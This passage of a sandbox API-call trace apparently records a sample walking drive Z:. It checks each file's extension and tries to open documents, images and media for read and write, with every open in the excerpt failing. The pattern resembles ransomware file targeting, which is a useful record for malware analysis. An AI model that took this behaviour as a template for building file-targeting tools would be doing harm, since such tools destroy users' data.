dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.889] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16553, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XsxuUpRBb.png", cAlternateFileName="")) returned 1 [0181.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.890] PathFindExtensionW (pszPath="Z:\\XsxuUpRBb.png") returned=".png" [0181.895] CreateFileW (lpFileName="Z:\\XsxuUpRBb.png" (normalized: "z:\\xsxuuprbb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.896] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11336, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZyT73XuoM.png", cAlternateFileName="")) returned 1 [0181.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.897] PathFindExtensionW (pszPath="Z:\\ZyT73XuoM.png") returned=".png" [0181.902] CreateFileW (lpFileName="Z:\\ZyT73XuoM.png" (normalized: "z:\\zyt73xuom.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.903] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x118b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F2MyXNYBvTRkVNI7iEZq.ods", cAlternateFileName="")) returned 1 [0181.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.903] PathFindExtensionW (pszPath="Z:\\F2MyXNYBvTRkVNI7iEZq.ods") returned=".ods" [0181.909] CreateFileW (lpFileName="Z:\\F2MyXNYBvTRkVNI7iEZq.ods" (normalized: "z:\\f2myxnybvtrkvni7iezq.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.910] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbc27, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YfJ9v2Plxllw22M.pps", cAlternateFileName="")) returned 1 [0181.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.911] PathFindExtensionW (pszPath="Z:\\YfJ9v2Plxllw22M.pps") returned=".pps" [0181.916] CreateFileW (lpFileName="Z:\\YfJ9v2Plxllw22M.pps" (normalized: "z:\\yfj9v2plxllw22m.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.917] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.917] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4fa3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="17V0s09qqy.m4a", cAlternateFileName="")) returned 1 [0181.917] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.917] PathFindExtensionW (pszPath="Z:\\17V0s09qqy.m4a") returned=".m4a" [0181.923] CreateFileW (lpFileName="Z:\\17V0s09qqy.m4a" (normalized: "z:\\17v0s09qqy.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.924] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xc5f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lhOcmpk4G7IYSvvb.gif", cAlternateFileName="")) returned 1 [0181.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.924] PathFindExtensionW (pszPath="Z:\\lhOcmpk4G7IYSvvb.gif") returned=".gif" [0181.930] CreateFileW (lpFileName="Z:\\lhOcmpk4G7IYSvvb.gif" (normalized: "z:\\lhocmpk4g7iysvvb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.931] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x546b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XAdhL2WimPIvd1az2SF4.avi", cAlternateFileName="")) returned 1 [0181.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.932] PathFindExtensionW (pszPath="Z:\\XAdhL2WimPIvd1az2SF4.avi") returned=".avi" [0181.937] CreateFileW (lpFileName="Z:\\XAdhL2WimPIvd1az2SF4.avi" (normalized: "z:\\xadhl2wimpivd1az2sf4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.938] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13931, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f8MOguJ.mkv", cAlternateFileName="")) returned 1 [0181.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.938] PathFindExtensionW (pszPath="Z:\\f8MOguJ.mkv") returned=".mkv" [0181.944] CreateFileW (lpFileName="Z:\\f8MOguJ.mkv" (normalized: "z:\\f8moguj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.945] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265bb779, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11953, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MvTzQbxzFuteK4.avi", cAlternateFileName="")) returned 1 [0181.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.945] PathFindExtensionW (pszPath="Z:\\MvTzQbxzFuteK4.avi") returned=".avi" [0181.951] CreateFileW (lpFileName="Z:\\MvTzQbxzFuteK4.avi" (normalized: "z:\\mvtzqbxzfutek4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.957] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd40b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="woWNv.ods", cAlternateFileName="")) returned 1 [0181.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.957] PathFindExtensionW (pszPath="Z:\\woWNv.ods") returned=".ods" [0181.962] CreateFileW (lpFileName="Z:\\woWNv.ods" (normalized: "z:\\wownv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.964] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17183, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0sa57fW.pptx", cAlternateFileName="")) returned 1 [0181.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.964] PathFindExtensionW (pszPath="Z:\\0sa57fW.pptx") returned=".pptx" [0181.969] CreateFileW (lpFileName="Z:\\0sa57fW.pptx" (normalized: "z:\\0sa57fw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.970] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O2TDqFynLaMJwyS.avi", cAlternateFileName="")) returned 1 [0181.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.971] PathFindExtensionW (pszPath="Z:\\O2TDqFynLaMJwyS.avi") returned=".avi" [0181.976] CreateFileW (lpFileName="Z:\\O2TDqFynLaMJwyS.avi" (normalized: "z:\\o2tdqfynlamjwys.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.977] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f21, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m2U2YlUMt.gif", cAlternateFileName="")) returned 1 [0181.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.978] PathFindExtensionW (pszPath="Z:\\m2U2YlUMt.gif") returned=".gif" [0181.983] CreateFileW (lpFileName="Z:\\m2U2YlUMt.gif" (normalized: "z:\\m2u2ylumt.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.985] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.985] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x10ef0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e8sPU7Zk.ots", cAlternateFileName="")) returned 1 [0181.985] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.985] PathFindExtensionW (pszPath="Z:\\e8sPU7Zk.ots") returned=".ots" [0181.990] CreateFileW (lpFileName="Z:\\e8sPU7Zk.ots" (normalized: "z:\\e8spu7zk.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.992] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x86e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hRvB1xDrUsAHG.flv", cAlternateFileName="")) returned 1 [0181.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.992] PathFindExtensionW (pszPath="Z:\\hRvB1xDrUsAHG.flv") returned=".flv" [0181.997] CreateFileW (lpFileName="Z:\\hRvB1xDrUsAHG.flv" (normalized: "z:\\hrvb1xdrusahg.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.999] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6047, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vnG2KifH.xlsx", cAlternateFileName="")) returned 1 [0181.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.999] PathFindExtensionW (pszPath="Z:\\vnG2KifH.xlsx") returned=".xlsx" [0182.005] CreateFileW (lpFileName="Z:\\vnG2KifH.xlsx" (normalized: "z:\\vng2kifh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.007] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcc3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="foUlybK2h.xlsx", cAlternateFileName="")) returned 1 [0182.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.007] PathFindExtensionW (pszPath="Z:\\foUlybK2h.xlsx") returned=".xlsx" [0182.013] CreateFileW (lpFileName="Z:\\foUlybK2h.xlsx" (normalized: "z:\\foulybk2h.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.014] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.014] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x4f93, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IZnOWmy.gif", cAlternateFileName="")) returned 1 [0182.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.015] PathFindExtensionW (pszPath="Z:\\IZnOWmy.gif") returned=".gif" [0182.020] CreateFileW (lpFileName="Z:\\IZnOWmy.gif" (normalized: "z:\\iznowmy.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.022] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb8e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1FCq528Tci.avi", cAlternateFileName="")) returned 1 [0182.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.022] PathFindExtensionW (pszPath="Z:\\1FCq528Tci.avi") returned=".avi" [0182.028] CreateFileW (lpFileName="Z:\\1FCq528Tci.avi" (normalized: "z:\\1fcq528tci.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.029] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe48a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6IOKuPykR.odp", cAlternateFileName="")) returned 1 [0182.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.029] PathFindExtensionW (pszPath="Z:\\6IOKuPykR.odp") returned=".odp" [0182.035] CreateFileW (lpFileName="Z:\\6IOKuPykR.odp" (normalized: "z:\\6iokupykr.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.036] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x758d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GeC6sbZ4BP3n.rtf", cAlternateFileName="")) returned 1 [0182.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.037] PathFindExtensionW (pszPath="Z:\\GeC6sbZ4BP3n.rtf") returned=".rtf" [0182.042] CreateFileW (lpFileName="Z:\\GeC6sbZ4BP3n.rtf" (normalized: "z:\\gec6sbz4bp3n.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.044] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x904d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ICCtCDKhaB3ppqcf.pptx", cAlternateFileName="")) returned 1 [0182.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.044] PathFindExtensionW (pszPath="Z:\\ICCtCDKhaB3ppqcf.pptx") returned=".pptx" [0182.050] CreateFileW (lpFileName="Z:\\ICCtCDKhaB3ppqcf.pptx" (normalized: "z:\\icctcdkhab3ppqcf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.051] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, 